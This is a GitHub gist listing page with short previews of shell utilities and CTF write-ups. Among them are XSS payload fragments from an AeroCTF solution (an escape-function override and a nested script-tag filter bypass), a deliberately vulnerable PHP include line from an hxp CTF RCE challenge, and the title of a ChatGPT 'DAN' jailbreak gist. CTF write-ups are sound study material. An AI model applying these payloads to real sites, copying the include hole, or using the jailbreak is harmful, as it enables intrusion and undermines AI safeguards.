Skip to content

Instantly share code, notes, and snippets.

View lebr0nli's full-sized avatar
😁
Segmentation fault (core dumped)

Alan Li lebr0nli

😁
Segmentation fault (core dumped)
160 followers · 196 following
View GitHub Profile
@fl0w
fl0w / lazynvm.sh
Last active May 2, 2025 14:37
# lazyload nvm
# all props goes to http://broken-by.me/lazy-load-nvm/
# grabbed from reddit @ https://www.reddit.com/r/node/comments/4tg5jg/lazy_load_nvm_for_faster_shell_start/
lazynvm() {
unset -f nvm node npm npx
export NVM_DIR=~/.nvm
[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm
if [ -f "$NVM_DIR/bash_completion" ]; then
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
@nektro
nektro / update_zig.sh
Last active December 16, 2024 11:18
#!/usr/bin/env bash
set -e
arch=$(uname -m)
os=$(uname -s | tr '[:upper:]' '[:lower:]')
double="$arch-$os"
if [[ $1 == *"dev"* ]]; then
wget -q --show-progress https://ziglang.org/builds/zig-linux-x86_64-$1.tar.xz
@jorgectf
jorgectf / AeroCTF_2021_Not-received-points.md
Last active March 1, 2021 10:45
AeroCTF 2021's "Not received points" solution.

Void _.escape

// this made empty the client-side func that escaped our input
_.escape = function(s) {return s}

Leak flag image uri

// XSS through JSONP from accounts.google.com
<scr<script>ipt src="https://accounts.google.com/o/oauth2/revoke?callback=(function(){
@maple3142
maple3142 / utf7.py
Created July 7, 2021 03:20
import string
b64table = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
def to_utf7(s):
ret = ""
for c in s:
n = ord(c)
bits = f"{n:016b}00"
@loknop
loknop / writeup.md
Created December 30, 2021 14:59
Solving "includer's revenge" from hxp ctf 2021 without controlling any files

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@coolaj86
coolaj86 / ChatGPT-Dan-Jailbreak.md
Last active May 17, 2025 21:51
@maple3142
maple3142 / README.md
Last active September 16, 2024 08:18
poor man's ngrok with cloudflared and mitmproxy

Poor man's ngrok

Prequisites

  • zsh
  • python3
  • tmux
  • cloudflared
  • mitmproxy
@maple3142
maple3142 / export_pdf.sh
Last active September 23, 2024 16:05
Convert markdown to pdf using pandoc and chromium
#!/bin/sh
source=$1
dest=$2
if [ -z "$source" ] || [ -z "$dest" ]; then
echo "Usage: $0 <source> <dest>"
exit 1
fi
tmpmd="$(mktemp tmp-XXXXXX.md)"
tmphtml="$(mktemp tmp-XXXXXX.html)"
@maple3142
maple3142 / README.md
Last active February 21, 2025 07:55
Rootless Tailscale

Running tailscaled

Download static tailscaled binary here

TAILSCALED_SOCKET="/tmp2/$USER/tailscaled.sock"
TAILSCALED_STATE="tailscaled.state"
./tailscaled --tun=userspace-networking --state="$TAILSCALED_STATE" --socket "$TAILSCALED_SOCKET"
@arkark
arkark / README.md
Last active May 10, 2025 00:25
bi0sCTF 2024 - web/required notes & web/required notes revenge